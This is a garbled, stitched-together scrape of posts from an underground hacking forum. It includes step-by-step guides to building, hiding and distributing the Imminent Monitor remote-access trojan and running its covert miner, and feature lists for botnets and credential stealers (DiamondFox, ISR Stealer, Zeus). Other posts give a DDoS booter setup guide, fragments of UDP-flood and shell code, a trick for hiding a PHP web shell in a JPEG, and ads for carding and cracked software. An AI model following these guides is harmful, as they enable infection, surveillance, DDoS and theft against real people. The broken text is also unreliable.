once the home screen imminent monitor click the builder tab. 
the box next dns enter your hostname. 
the box next port enter the port that you port forwarded your router. 
put the server anything you want. 
wave your mouse over the characters the mutex for few seconds. 
here you can add the server startup. 
this means will run every time the client turns their computer. 
recommend that you use hkcu and not the other options because then does not matter the client administrator not. 
the top you can pick where install the file. 
recommend that you not pick temp the files the temp folder are not needed and people use tools like ccleaner lot clear the temp folder. 
you can call the file and folder whatever you want but you want keep more hidden recommend that you use name that looks legit and people wouldnt deem suspicious. 
the protector settings tab. 
here recommend that you keep everything. 
you disable task manager people will become suspicious really quick would not recommend. 
registry persistance and attempt bsod kill can sometimes not work and sometimes mess the file little from experience wouldnt recommend them. 
the assembly settings tab. 
recommend that you just click generate until you find something good that looks legit. 
also good thing sometimes get the title generated assembly and then use the folder and file name the installation tab for look more legit. 
the final build settings tab. 
you would like give the file icon select 'enable icon changer' and browse for the icon you want. 
you want keep the settings saved you not have type them again you want them again tick 'save settings'. 
you want the file crypted that not detected anti viruses select 'crypt file fud. 
out the builder and click 'settings'. 
here add your port forwarded port and start listening. 
then whenever someone runs your file you will get them the 'clients' section your rat. 
after the last step you can upload your file website for people download. 
you can also upload virus scanning website you want see what the detection rate. 
then you are done guys the title says this tutorial will about how setup the miner imminent monitor. 
feel that this tutorial necessary because many customers don't know how use the recent update. 
think would great addition the many imminent monitor tutorials and think shockwave would find this tutorial very helpful both him and you guys takes lot load off him and also shows you guys the customers how use. 
first start right clicking your client and then selecting crypto miner. 
you will presented with this new window. 
now select your client and click the new miner button located the bottom right hand corner the window and you will presented with yet another window. 
this window you put your miner and pool details like. 
it's important that you don't forget the stratum tcp otherwise this wont work once done click start mining you'll notice that the status the miner will say downloading files this because imminent monitor doesn't come with the miner files the stub which good because otherwise the stub would big. 
when its finished downloading you'll see that has started from the status tab. 
can verify its working looking the gpu temperature program like speccy and done sandboxie the process vbc. 
exe will start and will tell you the stats cmd window. 
usually most coin sites take hour update your miner statistics your stats aren't shown the website straight away don't panic verify everything working testing sandboxie. 
this cracked version will not provide any support any kind this crack found underground forums and not held liable for what you with this imminent. 
thanks bro appreciate rep. 
this file can downloaded premium only. 
can posy tut for fud codefire wrote tutorial hack anyone facebook email. 
com file where can get host for unlimited spamming. 
don't serve members with virus. 
thanks for the share man. 
diamondfox botnet latest download. 
kaxv faetures pos dumps grabber download and execute memory download and execute disk open website visible open website hidden udp flood http flood enable disable host editor enable disable pos grabber spam with bots inbox bitcoin wallet stealer facebook twitter message spread firefox homepage changer enable disable keylogger take screenshot password grabber chorme firefox opera iexplore safari ftp grabber filezilla instant messaging password grabber grab email smtp pop and imap update bot uninstall. 
this works the man thank you. 
thanks buddy much appreciated. 
thanks for the post nice share the link the dead bro. 
would love see really work. 
going try this out. 
about isr stealer made romania europe release date. 
xakep and tinkode credits cobein bilal ghouri squeezer rtflol and nirsoft team. 
beta testers linuxgirl zippy and wav updated. 
send logs sql data base php change server icon steal options internet explorer all versions mozilla firefox all versions google chrome all versions opera all versions safari all versions vpn network accounts yahoo messenger password msn messenger pidgin filezilla internet download manager idm jdownloader trillian attach config attach attach config attach download isr stealer. 
com download azo ndv isr stealer. 
rar you can search google for how set. 
you need help with set. 
guess its still working. 
thanks for sharing will try. 
havij and what you use. 
click here get download links. 
thank you can't wait check out the tutorial and see how this works. 
color salam aliakom hash. 
hash identifier great tool help you decrypt hashes algorithms can detect code hmac wordpress ntlm radmin. 
ripemd snefru tiger mysql sha sha pass mysql bit sha sha pass ripemd sha sha mangos tiger tiger pass. 
salt joomla sha django sha ripemd snefru pass. 
salt joomla sam hash hash sha django ripemd sha sha sha django sha whirlpool let's exploit the use backtrack drive. 
the first command code pentest passwords hash identifier than run the tool using this command code python hash. 
after that paste hash code and hit enter finaly you will see the ruselt and now you know you can use passowrdpro. 
its not possible seems script kiddie. 
often referred simply amazon american electronic commerce and cloud computing company with headquarters seattle washington note dont change password note url has been shorten account details. 
linke kla sagusten skip bas lcak freler link. 
social network that pays you day for likes shares comments your posts can't believe right hehe yes too first thought this site spam. 
but then later only after reading several reviews and seeing that site realized that real and not spam you may have used facebook for last years but havn found anything useful terms revenue. 
well that because you are not getting any money any gift voucher from facebook. 
well here the solution for. 
this social network like facebook but gives its its revenue the users. 
tsu social network which gives social revenues back you. 
but unlike facebook you just can sign into just typing your name and giving email address. 
you will have need invitation tsu verified profile links. 
which ready provide you use the link below join tsu and follow them know more about revenue making from tsu. 
register with this link. 
techn above link directs you profile also provides you the signup form interested profile follow smile will follow you back biggrin let's the revenue making part how you earn money tsu well per the guidelines from tsu person with average number friends can earn upto day average. 
since tsu itself does not invite anyone the platform gives its users short code invite other members and distributes the revenue from its ads back the users. 
this unique architecture creates going revenue stream for its everyday users. 
this method will incentivize users invite friends. 
the larger user network the more money they can make. 
tsu dashboard how much person can make from tsu practical sense would look something like this user invites user user invites user user invites user user invites join. 
has users following him and posts unique picture his new car and users see this adding bunch likes and comments. 
advertisers have agreed run ads where they would pay for every people that see their called cpm cost per views. 
tsu collects from the advertisers and keeps off the top. 
the remaining keeps user who directly invited would get the remaining user who invited would get user who invited user would get. 
user who invited user would get. 
this trend continues until the revenue. 
start making some bucks while enjoing the social media experience yeye register tsu. 
blackhat wrote hello everyone telling you the legit website that paying for everyone who sign this site. 
cool man easiest way earn money without doing much effort. 
tried this and got paid thanks attach config attach. 
let's check first are work not and are this tool free from backdoor. 
friend this new app for crack rdp vnc telnet ssh ftp smb pop pop will post link download and tutorial for use after rate. 
your post will send link download and tutorial for that app. 
everytime run the program get fault message email cracker has stopped working problem caused the program stop working correctly. 
using win bit any ideas. 
stop wasting your time and earn some cash buy some good stuffs click the below link singup earn. 
who want buy something here link. 
thanks alot for these. 
this swiss based cloud storage account. 
whether through manual poking and prodding the use security testing tools malicious attackers employ variety tricks break into sql server systems both inside and outside your firewall. 
stands reason then the hackers are doing you need carry the same attacks test the security strength your systems. 
here are hacker tricks gain access and violate systems running sql server. 
direct connections via the internet these connections can used attach sql servers sitting naked without firewall protection for the entire world see and access. 
dshield's port report shows just how many systems are sitting out there waiting attacked. 
don't understand the logic behind making critical server like this directly accessible from the internet but still find this flaw assessments and all remember the effect the sql slammer worm had many vulnerable sql server systems. 
nevertheless these direct attacks can lead denial service buffer overflows and more. 
vulnerability scanning vulnerability scanning often reveals weaknesses the underlying the web application the database system itself. 
anything from missing sql server patches internet information services iis configuration weaknesses snmp exploits can uncovered attackers and lead database server compromise. 
the bad guys may use open source home grown commercial tools. 
some are even savvy enough carry out their hacks manually from command prompt. 
the interest time and minimal wheel spinning recommend using commercial vulnerability assessment tools like qualysguard from qualys inc. 
for general scanning webinspect from spi dynamics for web application scanning and next generation security software ltd. 
ngssquirrel for sql server for database specific scanning. 
they're easy use offer the most comprehensive assessment and turn provide the best results. 
figure shows some sql injection you may able uncover. 
sql hacker fig figure common sql injection found using webinspect. 
enumerating the sql server resolution service running udp port this allows you find hidden database instances and probe deeper into the system. 
great tool use look for sql server system and determine version numbers somewhat. 
this works even your sql server instances aren't listening the default ports. 
also buffer overflow can occur when overly long request for sql servers sent the broadcast address for udp port. 
cracking passwords deciphering passwords also used attackers get into sql server databases. 
unfortunately many cases cracking needed since password has been assigned logic where art thou. 
yet another use for the handy dandy sqlping tool mentioned earlier. 
the commercial products appdetective from application security inc. 
and ngssqlcrack from ngs software ltd. 
also have this capability. 
direct exploit attacks direct attacks using tools such metasploit shown figure and its commercial equivalents canvas and core impact are used exploit certain found during normal vulnerability scanning. 
this typically the silver bullet hack for attackers penetrating system and performing code injection gaining unauthorized command line access. 
figure sql server vulnerability exploitable using metasploit's msfconsole. 
sql injection sql injection attacks are executed via front end web applications that don't properly validate user input. 
malformed sql queries including sql commands can inserted directly into web urls and return informative errors commands being executed and more. 
these attacks can carried out manually you have lot time. 
once discover that server has potential sql injection vulnerability prefer perform the follow through using automated tool such spi dynamics' sql injector shown figure. 
figure spi dynamics' sql injector tool automates the sql injection process. 
blind sql injection these attacks about exploiting web applications and back end sql servers the same basic fashion standard sql injection. 
the big difference that the attacker doesn't receive feedback from the web server the form returned error messages. 
such attack even slower than standard sql injection given the guesswork involved. 
you need good tool for this situation and that's where absinthe shown figure comes handy. 
figure absinthe tool takes the pain out blind sql injection testing. 
reverse engineering the system the reverse engineering trick looks for software exploits memory corruption weaknesses and. 
this sample chapter from the excellent book exploiting software how break code greg hoglund and gary mcgraw you'll find discussion about reverse engineering ploys. 
google hacks google hacks use the extraordinary power the google search engine ferret out sql server errors such incorrect syntax near leaking from publicly accessible systems. 
several google queries are available johnny long's google hacking database. 
look the sections titled error messages and files containing passwords. 
hackers use google find passwords web servers underlying operating systems publicly available procedures and more that they can use further compromise sql server system. 
combining these queries with web site names via google's 'site operator often turns juicy info you never imagined you could unearth. 
perusing web site source code source code can also turn information that may lead sql server break. 
specifically developers may store sql server authentication information asp scripts simplify the authentication process. 
manual assessment google could uncover this information split second. 
txt password and start cracker download. 
thanks very much bodies. 
replying see the link. 
thanks brother best mailer. 
how did you hacked these acts. 
man somebody has changed the password. 
great job like your idea you want help newbies and stuff soulud like have reply tough have good day. 
this also good post. 
needed this link lot haha. 
lets see its legit one. 
secretsquirell wrote url url diamond jewellery collection engagement rings earrings necklaces bangles with latest designs andy tuohy shop buy prints and posters item url url welcome institute industrial arts technology education treadmills treadmills url url return url prod detail url url url jewish calendar tools home heavy metal url datestamp url datestamp url datestamp url material safety data sheets adler's pool centre url url spidermonkey canadian search url url url homepal your pal home video entertainment url dnworld homepage foradejogo. 
net ponte barca campos divis honra viana castelo accessories url url url home url page url url. 
uploaded mobile prank hacktool. 
api files uflyek blob download. 
someone change the password. 
moskva russian federation blacklist checked. 
nice one dude thankls. 
lets see what you've gotta ere. 
pretty sure this wont work. 
thanks for valuable info. 
thanks matey looks good. 
zorro negro wrote pid dateline cyberseason tor almost undetectable all the anti viruses sweet site gracias thanks lot. 
well let's see what have here friend. 
thanks bro lot have looking after that since month. 
would love see what you got. 
thanks for sharing the tool. 
virginia united states blacklist checked. 
kharkivs 'ka oblast unknow. 
net ukraine blacklist checked. 
oregon united states blacklist checked. 
nord pas calais lns bzn. 
odes 'ka oblast unknow ukraine blacklist checked. 
thread modes webroot hack tools special bypass shell webr offline junior member posts threads joined mar reputation money donate hello. 
hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links i'm glad you commented use. 
png webr offline junior member posts threads joined mar reputation money donate where thank mesmin offline junior member icq posts threads joined mar reputation money donate thanks bro good webr offline junior member posts threads joined mar reputation money donate thanks. 
kalaula offline junior member posts threads joined jun reputation location philippines country philippines money. 
donate thanks for the share boss river offline junior member posts threads joined jun reputation location hackers country algeria money. 
donate shell xexor offline junior member posts threads joined jun reputation location afghanistan country afghanistan money. 
donate wow love this shell deept offline junior member posts threads joined jun reputation location turkey country turkey money. 
donate very good thanks bro shubham prajapati offline member posts threads joined may reputation location varanasi country india money. 
donate good stuff acess internet injectordevil offline junior member posts threads joined jun reputation location dick country afghanistan money. 
for this nice tool. 
hello orxteam you guys have any support. 
rar password vipunderground download url pls inbox the link vyrus wrote all mail password cracker. 
rar password vipunderground download url the link provided above ain't working man would you please send the direct link. 
looking forward implementing these methods. 
thank you very much kind sir. 
want test let see the links. 
his method that have been using make some money all this with bot and autopilot register here. 
mabts guys this autopilot you not need click your ads just download the software and click view ads after you view all your ads click with the software progrid this will watch automatically guide info instant payment better rates. 
standard member compared neobux rented refferals are more active than neobux refferals probux strategy well defined. 
strategy you don need invest nothing just use the software auto click your ads first. 
auto click all your ads everyday with the software link download software. 
jpg software instructions enter your username and password click login. 
you must not logged the website progrid will your daily clicks the progrid. 
view ads will view all available ads. 
the loop view enabled will check for new ads after minutes. 
the software will notify you when there any sites that prevents the software auto check your ads just click leave this page. 
through clicking your ads everyday. 
transfer the money from your main balance your rental balance. 
turn autopay your rented referrals page. 
maintain your referrals and recycle the ones that have average below haven't clicked days. 
buy more referrals when you can. 
not cash out any the money common quitters mistake that you gain your main balance this used for buying more referrals and maintaining them. 
once you reach referrals stop renting anymore referrals and just maintain the ones that you have. 
that means recycle the bad clickers and keep average least. 
build your money about and then upgrade golden. 
once you get golden membership keep renting more referrals and maintaining them. 
once you hit referrals you can stop renting referrals and just maintain them and start cash out your money. 
standard member you have keep average. 
golden member you have keep average. 
order make profit math standard members referrals. 
per day earning from referrals golden members referrals. 
per day earning from referrals. 
com turkey blacklist checked. 
new york united states blacklist checked. 
really need this tool. 
staying anonymous read more hackindev. 
com this tutorial about two types protection. 
online protection offline protection first should get some offline protection. 
there are many ways protecting ourselves. 
remember you should always have offline protection before hacking. 
pro tip never trust anyone the internet. 
there are lot bots and individuals that add services for the sole purpose infecting. 
offline protection note this part offline protection refers protecting your computer from viruses trojans root kits etc. 
may also refer encryption such file encryption protection and such. 
very important protect your files because can't always trust the ways online anonymity. 
goes wrong our offline protection should save. 
trojans and viruses remain great challenge our anonymity. 
there are always trojans around and get infected the attacker may use our machine proxy and has full control our machines. 
protect yourself from malware malwarebytes' anti malware malwarebytes' anti malware mbam computer application that finds and removes malware. 
made malwarebytes corporation link. 
org encrypt your keystrokes using keyscrambler keyscrambler keyscrambler anti keylogging program designed specifically strengthen your security. 
com get firewall comodo firewall always recommended use firewall when doing hacking. 
comodo firewall award winning personal firewall software internet. 
com protect your files and using true crypt. 
truecrypt truecrypt free open source disk encryption software for windows vista mac and linux. 
net use virtual machines for hacking vmware player vmware player always good idea hacking from virtual machine because anything goes wrong just delete using good file eraser. 
com web vmware free. 
layer deepfreeze your prevent common attacks deepfreeze faronics deep freeze makes your indestructible. 
protects your computer freezing its original configuration which prevents unwelcome unwanted changes made while session from sticking. 
with simple restore reboot your system integrity maintained helping your machines run smoothly and efficiently giving you more time and boosting user productivity. 
nterprise spoof your mac address using tmac tmac technitium mac address changer allows you change spoof media access control mac address your network interface card nic irrespective your nic manufacturer its driver. 
has very simple user interface and provides ample information regarding each nic the machine. 
html download use ccleaner the multi purpose tool ccleaner cleaner multi purpose tool which can used for deleting files clearing temp files cache etc. 
com ccleaner download clear the evil cookies flash cookie remover flash cookies are evil because they persist even you delete your browser's cookies. 
they are stored separately from normal site cookies and therefore need special tool delete them. 
com flash cookie remover link. 
exe other tips don't think that using linux mac can't get you viruses. 
there are also malware that works this operating systems. 
malware programmers don't feel the need write malware for this oss since they are not used many people. 
online protection now are moving online protection. 
you know this very important also more than offline protection. 
common methods online protection are discussed below. 
types online protection vpn proxies tor ssh tunneling url url. 
org wiki virtual private network vpn virtual private network virtual private network vpn network that uses primarily public infrastructure such the internet provide remote offices traveling users access central organizational network. 
vpn provides secure way connecting websites hiding our and encrypting our information. 
org wiki virtual private network free vpns cyberghost hotspot shield pro xpn open vpn url url. 
alive proxy hide ass proxy list more here. 
pro tip don't use hidemyass for hacking. 
credits imario use tor for secure browsing tor tor free software and open network that helps you defend against form network surveillance that threatens personal freedom and privacy confidential business activities and relationships and state security known traffic analysis source and more. 
ssh tunneling things you will need for ssh tunneling putty firefox preferred steps tunneling open putty enter your the hostname address text box find your you can use command prompt. 
just type ipconfig and click enter. 
now the left putty you will see list. 
click the symbol ssh. 
from the drop down click tunnels you need input port and the click dynamic. 
now click add and open the connection. 
now your browser proxy settings type. 
for and the selected port for port. 
however that does not mean nobody secure. 
should take steps protect ourselves the world wide web. 
daily large amount cyber crimes occurs and identity theft one them. 
black hats ruin peoples' lives for personal gain. 
our duty remain secure. 
sincerely hope this guide helped you. 
thank you thank you thank you. 
ghost zombie stress test system. 
the greatest attack mode the might syn association. 
serve the end and run and conceal. 
pass the initiative defence. 
pierce through the wall. 
self service fud system. 
wly vqydq attach config attach. 
hide found some header exploits. 
basically you can modify headers before they are sent. 
load the script into tampermonkey and web. 
com and voila you can scare the fuck out your friends spoofing links that lead screamers current font size can from unseeable whatever you want. 
think somewhere over what limited too the pictures use the biggest example. 
font exploit only works for the desktop and mobile versions though the website version just shows the font tags but thats fine since one uses the web version. 
currently link spoofing doesn't work with. 
when spoofing the link text you can only have google. 
com the round brackets. 
don't ask why lol link link hide. 
this script new and mailer all inbox. 
let see the links. 
com website and have forgotten password and email also may not login page you can hack the page get password that page jimdo. 
but not that you think want you hack jimdo. 
com want you hack jimdo free website exampel halodj. 
will like know how that. 
color today here with bumper collection. 
enjoy first skip the add than enjoy those pass username color. 
can wait try this hope works. 
would like test this out going try this locker and give review. 
link dead upload again diablo. 
post thread pay with any payment method other than paypal. 
thanks for this mate virustotal i'm not using. 
txt password and start cracker download url nicee bro. 
thanks you geekmango wrote making darkcomet rat fud working this post demonstrates how make darkcomet rat undetectable. 
microsoft visual studio thank you. 
thx bro for yhis like. 
very good support very good support. 
painkiller wrote hello today i'm releasing new tool bitcoin litecoin terracoin ppcoin wallet stealer entirely coded. 
here's some screenshots img img and some informations builder isn't detected avs the stub detected img stub weight. 
here's the download link url url please say thanks this program has been made for educational purposes only. 
bond wrote free working php script check valid emails and registred with paypal. 
screenshoot download fix link please. 
pratham wrote luckmangamer wrote want get videos and ebooks. 
idespinner basic nmap usage adding modules slax backtrack live from windows part cracking bit wep key auditor breaking wep minutes crackign bit key entering the cridentials exploiting some bugs tools used windows cracking wpa networks auditor complete hacking video using metasploit meterpreter dos attack against windows ftp server how crack the local windows passwords the sam database droops box simple pen test using nmap nikto bugtraq nslookup and other tools aireplay attack wireless client required exploiting weaknesses pptp vpn auditor finding rougue smb file shares your network cracking windows passwords with backtrack and the online rainbow tables plain text how sniff around switches using arpspoof and ngrep quick and dirty intro nessus using the auditor boot cracking syskey and the sam windows using samdump and john fun with ettercap filters want the videos and ebooks. 
start session and get the interactive commandline access remote windows box wmf file code execution vulnerability metasploit ssh dynamic port forwading sniffing voip using cain use brutus crack box running telnet cain arp poison and sniff passwords using network activ sniff webpages network content session understand the purpose the course and the phases hacking acquire the hardware and software for your laboratory build the windows hacker tool analysis laboratory build the linux hacker tool analysis laboratory test your laboratory and keep secure session understand low tech and computer based reconnaissance use sam spade gather information about target search the web for interesting target information session understand scanning techniques search for modems using thc scan develop network map using cheops conduct port scan using nmap scan for using nessus content session analyze buffer overflows crack passwords windows and linux sniff data from the network using sniffit use netcat the swiss army knife hacker tools session analyze application level trojan horse backdoor vnc analyze traditional rootkit lrk analyze kernel level rootkit kernel intrusion system session understand file hiding windows understand file hiding unix analyze protocol tunneling using reverse shell analyze covert channels using covert tcp nice. 
blazelord wrote thanks for sharing mate. 
salam many times you want upload shell website but the websites allows only jpg uploaded. 
but coulden't thats because the site uses php functions like getimagesize veryfie that really picture somthing lik this. 
can bypass injecting shell image using edjpgcom download. 
com yrteswv you need image. 
what next after downloading open cmd win cmd enter use change the directory the one where you stored the two files type path tool and image will some thing like this attach config attach when you press enter you will see some thing like this attach config attach now edjpg will open and you can write your php code into the picture. 
now your image contains your php code. 
change the extention the image file from image. 
why does this work getimagesize only works with images but your image. 
php looks for php like image with comment inside the extention doesent matter. 
many php tutorials like this one. 
tuts php datei upload. 
php say getimagesize secure and many websites use. 
now get xyz domain free for year using onlydomains registrar. 
more info about the offer dude post topic. 
got that with that. 
good tutorial for newbie. 
thanks mate god bless. 
cvv wrote need member help with zues botnet set and builder which work with latest browser happy they help. 
thanks bro seem cool. 
thanks will put use. 
thanks man needed this tool. 
com pass meendeofi how use step. 
can anyone hack online admin passwords its having jsp its extension. 
guess its called jsp hacking. 
need your help bro but have. 
the setup for free. 
does work other social sites. 
thanks for sharing 'pro. 
program which uses almlaeyen winzip excellent choice with his functions the two programs mentioned the usual also features the beauty its appearance addition dozens interfaces different suit all tastes very powerful software and huge deal with compressed files and supports several types including zip cab lha lzh tar tar. 
different anti viruses may give different results. 
have copy latest zeus kins botnet that grabs firefox latest grabs chrome latest grabs latest grab pop outlook logins grabs ftp shell logins backconnect module vnc module anti rapport anti tracker contact yahoo exploitdeal yahoo. 
seems nice and can use this method hack friend's facebook account. 
free download with full patch for lifetime activation internet download manager. 
build download for free. 
build resolved problems with google chrome extension. 
added support for firefox and seamonkey. 
resolved problems with downloading videos from several sites. 
when you the page from above link scroll down that page find the download option. 
vist this site for more updated versions idm and more cool stuff. 
thank you would also like give try can not break this link not open why outside the chain jump. 
show how show how show how show how. 
gracias bro por link sigue subiendo mas. 
would definitely check out before making further comments. 
painkiller wrote img let see. 
let see the tutorial. 
than you much friend. 
hello guys and welcome the prosecutor. 
before you prosecute someones the changes before you attack the person. 
this application was simply made using notepad and works very well and has been tested before. 
let's see how well this works. 
facebook hacking great ttp. 
hello today going show you how make your own private public web based booter. 
newb friendly step color find web hosting company that will let you run these files some web hosts don't allow this they break their terms service. 
and since not here spoon feed you i'm not wasting time find webhost that will let you. 
com there ahead and make account there. 
color step once you have made account and have chosen your domain and all that good stuff click 'go cpanel' then scroll down till you see 'file manager' click that public html then hit 'upload'. 
one you clicked that the right your screen there should option upload archives. 
you want hit browse and find the webfiles zip you downloaded the start. 
once you have that done click the green check mark and then the back arrow one thats done. 
step this the hardest bit. 
when you get back public html you want 'dbc. 
php' click edit and just stay that scree. 
now back your cpanel and mysql. 
you want create database. 
put the name something you will remember like 'boot something and the same for the username. 
when you have that done and your password typed click create database and stay that screen. 
where says mysql host you want copy the string and back 'dbc. 
php' and you want replace the host with your string value you copied. 
the same with database copy that and replace user with your database string. 
the same for the next. 
under that where says shallrotation change the. 
once thats done hit the blue floppy disk save and hit back. 
step now thats done you want into the folder that says 'includes' ezsql. 
php and click edit. 
scroll down bit until you see this color the same thing you did step that function statement. 
like color color this time the end where says 'dbhost' change the address your host address your mysql. 
scroll down again until you see something that looked like that but this time says 'function connect dbuser 'psychoti booter' dbpassword 'boot' dbhost 'localhost' the exact same before. 
have one more thing this part scroll down until you see this color color all you have copy and paste you database name inside the parenthesis. 
after that done click save color step navigate back your cpanel the top and click the link that have highlighted here color comes link the webpage that says web files click should take you login screen does not you have done something wrong and advise you start over. 
once you have done that back your cpanel and scroll down until you see 'phpmyadmin' click that and inside that click enter phpmyadmin and you should get screen like this color browse and upload the dbprepare that you downloaded after webfiles the start this tutorial and hit then register the login screen for your booter. 
once registered phpmyadmin the left and click users browse there should long number click the green checkmark then change the user level from which will make you admin the site and scroll down where says aprove change the and click. 
now login with the account you registered add shells and boot away tut miint. 
cool tut thank you. 
does work all email servers. 
will somebody say this works not. 
thanks for the tut really enjoyed reading. 
dude fixed the site redefaced and gonna give axs unfortunately think broke but here. 
ncpl admin via ssh think broke last night lol. 
email spam prank does the same your tool. 
thanks wil definitlyl try. 
cool man should try this. 
before donate will give personal skype number can try. 
obviously lol rf'd bro. 
current rank for mining have been seeing couple questions how get started bitcoin mining pool and going share how one the most easy and most profitable ways. 
with bitcoin prices over each now great time start. 
your first going want the pool site which triplemining best payouts. 
skczithis the sign link will explain more later now that have account head the workers page and add new worker. 
don't make too long now that you have account for the pool its time set the miner going assume that this your first time mining and you have idea what. 
start going here download easy money bitcoin mining triplemining guide pics. 
zip easy money bitcoin mining triplemining guide pics. 
zip you will want install this and put somewhere you can access again run guiminer the folder and you should see something like this size large will now make new miner you got message saying open devices you need update your drivers for your grapgics card. 
you don't know what type you have open start and type dxdiag and you should find. 
make any name for and now click server and find triplemining then enter your username and password for your worker and select your device mine. 
you can select many cores mine you want the more you check the more you can mine. 
remember your username your account worker like this now click view the top and click show summary check mark autostart and click start make sure save your miner you should mining now you get connection problems make sure you enter your workers details right. 
you should mining like champ and remember that team you joined earlier well earns bonus for whatever the miners get. 
you join and mine team will giveaway every weeks giveing all away which with enough people could become good amount. 
any questions troubles and will get back you. 
thank you thank you thank you thank you thank you thank you thank you thank you thank you. 
this was first administered another cat namely hood drob and later developed into more appropiate tool name evil image builder and meterpreter. 
here link understand using full. 
for linux code include. 
define jenis peluru define ukuran peluru int echo connect char short int echo connect char server short port struct sockaddr sin struct hostent int thesock printf printf nux. 
port server port gethostbyname server null printf gak ada sasaran boss server printf exit bzero char sin sizeof sin bcopy addr char. 
sin addr length sin. 
sin family addrtype sin. 
sin port htons port sin. 
sin port htons port thesock socket inet sock dgram connect thesock struct sockaddr sin sizeof sin return thesock main int argc char argv int argc printf printf kirim paket orang printf cara pake tembak hostname. 
orang port exit echo connect argv atoi argv for send jenis peluru ukuran peluru tembac. 
post 'dgpass' escaped command escapeshellcmd command exec escaped command isset post 'tembak path' tembak path post 'tembak path' else tembak path null isset post 'dgurl' dest post 'dgurl' else dest null isset post 'dguser' src post 'dguser' else src null isset post 'dgpass' length attack post 'dgpass' else length attack null echo 'tembak path. 
tembak primer what you will load the tembac. 
compile and than put the tembac. 
php server and have way manage the shells could turn this into botnet guys wanted. 
thanks very much brosef. 
thanks very handy straight for word that dou think this the easyist way. 
thnkx buddy sent from iphone using tapatalk. 
made what need and why. 
got dos job for you. 
contacted you skype and icq. 
lets chat its urgent. 
want try this later. 
click search home show off all forums community upgrade vip account search search forum help help documents money make money more more links offensive community xvyctim offensive community cracking zone cracking tools commview wifi hacker. 
full version guide full forum merge with indianhacker. 
net login with old details share pages next new reply thread rating thread modes commview wifi hacker. 
full version guide full luckmangamer offline member posts threads joined may reputation money donate attach config attach info commview for wifi powerful wireless network monitor and analyzer for. 
depending the traffic volume and usage mode the requirements may hight operating systems and bit windows windows server windows vista windows server windows click here get download links attached files thumbnail pratham away senior member posts threads joined jul reputation country india money. 
luckmangamer offline member posts threads joined may reputation money donate nice software and also includes guide for how use. 
pratham away senior member posts threads joined jul reputation country india money. 
donate luckmangamer wrote nice software and also includes guide for how use. 
inkbird offline junior member posts threads joined apr reputation money donate this file can downloaded premium only river offline junior member posts threads joined jun reputation location hackers country algeria money. 
donate sachinlorance offline junior member posts threads joined jun reputation location kerala country india money donate nice post sent from using tapatalk charmeur offline junior member posts threads joined jun reputation location stockholm country afghanistan money. 
donate thank you will give try nraghav offline junior member posts threads joined jun reputation location gwalior country india money. 
donate luckmangamer wrote attach config attach info commview for wifi powerful wireless network monitor and analyzer for. 
depending the traffic volume and usage mode the requirements may hight operating systems and bit windows windows server windows vista windows server windows azrael offline junior member skype posts threads joined jun reputation location usa country united states money. 
donate let see work for azrael the angel the death enter keywords search thread pages next new reply quick reply message type your reply this message here. 
thread author replies views last post thumbs selling original base with qualify dumps track and track creditcard and full originalhome last post originalhome platinum hide. 
serial key crack full version free download luckmangamer last post shunmanpros internet download manager. 
build final serial key crack full version free download. 
luckmangamer last post rafipunchiri quick heal total security. 
serial key crack full version free download. 
luckmangamer last post anniebiafra winrar. 
beta serial key crack full version free download. 
luckmangamer last post ghost bandicam. 
crack full bycoder last post internet download manager. 
build includes patch for lifetime activation full version free download luckmangamer last post rmtdxb internet download manager. 
build final full patched lifetime activation free download luckmangamer last post rmtdxb view printable version send this thread friend subscribe this thread forum jump users browsing this thread xvyctim about offensive community offensive community world best underground hacking forum that provides tutorials latest hacking techniques free tools and great online teaching our members. 
i'm trying get into website using phpcms iis. 
looked into the phpcms code and find something like this code filename str replace array. 
request 'c' str replace array. 
request 'c' filepath path. 
php' file exists filepath classname filename include filepath mypath base path filepath classname 'my. 
filename include mypath class exists classname return new classname else exit 'controller does not exist. 
else echo filepath exit 'controller does not exist. 
since working windows machine can provide path using directory separator instead and bypass the str replace. 
goal make this code include. 
jpg which phpshell uploaded before. 
how can reach folders parent directory also something can done for the upload part which has code like this code isset globals pic globals isset get 'width' empty get 'width' width intval get 'width' isset get 'height' empty get 'height' height intval get 'height' isset get 'file' empty get 'file' get 'file' str ireplace array 'php' get 'file' image get 'file' false stripos get 'file'. 
php' false exit file get 'file' basename basename file strpos basename 'thumb false file arr explode basename basename array pop file arr fileext strtolower fileext basename array fileext array 'jpg' 'gif' 'jpeg' 'png' 'bmp' exit new file 'thumb. 
basename filepath date file put contents this upload path. 
new file pic else return false echo base load config 'system' 'upload url'. 
new file exit image function just checking the extension valid image extension jpg jpeg tiff png. 
tried upload something with filename 'shell. 
jpg' also supports asp scripts but created file named 'shell. 
asp' server without content. 
anything can done here. 
cool bro thanks for share. 
bourdj wrote you have look the link url want answers pls see. 
bro need exact link only getting html pages hacking request per domain charge but almost always successful like hack banks govs and orgs especially edus tutmoses name. 
did notice that the link dead too. 
thanks for sharing nice you boss. 
that's very good you thanks. 
this real cant there cant way. 
lets check this out thanks for sharing. 
link didnt work lets try again. 
nice shit imma check. 
droidjack the best android rat does not require root access work. 
some its capabilities include listening phone calls recording audio and video using the microphone and camera and extracting the phone gps data. 
droidjack also can steal files from the device look messages and find out the carrier details. 
all there are more than separate features. 
com watch upo udcuw skype geekmango email geekmango gmail. 
that's awesome thanks mate for that share. 
thanks for sharing this botnet bless you. 
med bad boy wrote salam many times you want upload shell website but the websites allows only jpg uploaded. 
can bypass injecting shell image using edjpgcom download url you need image. 
many php tutorials like this one url say getimagesize secure and many websites use. 
this will definatley fun play with. 
can you help hack facebook account. 
porcodio perch duie erss. 
yahoo gmail url thanks. 
can give the accounts out instantly ready use. 
blazelord wrote hey guys today would sharing this email spoofer hide here keep the thread alive for password crypt dxd hide all credits crypt. 
hakgodwill see the links wrote dumps carding tutorial beginning before you out there and start instoring you will need the following items. 
let check this out real quick. 
thank you for this password. 
let's try hope works. 
used brute force for ftp accouns from there their cpanel and whm passwords were their code. 
there's like sites here for everyone access someone wants set bot net. 
sure post what you did. 
some people just and add hacked html page. 
come really that's blah why not something like make the physical server overload make impossible recover any the websites. 
let try this one out. 
how find shell image website. 
thanks great share brother. 
where live and what isp you have. 
depends modem and not all modems can not change speed. 
thanks for sharing man. 
hey guys searching for partnership with android developer. 
general its about bypassing detects. 
sure will deal something out. 
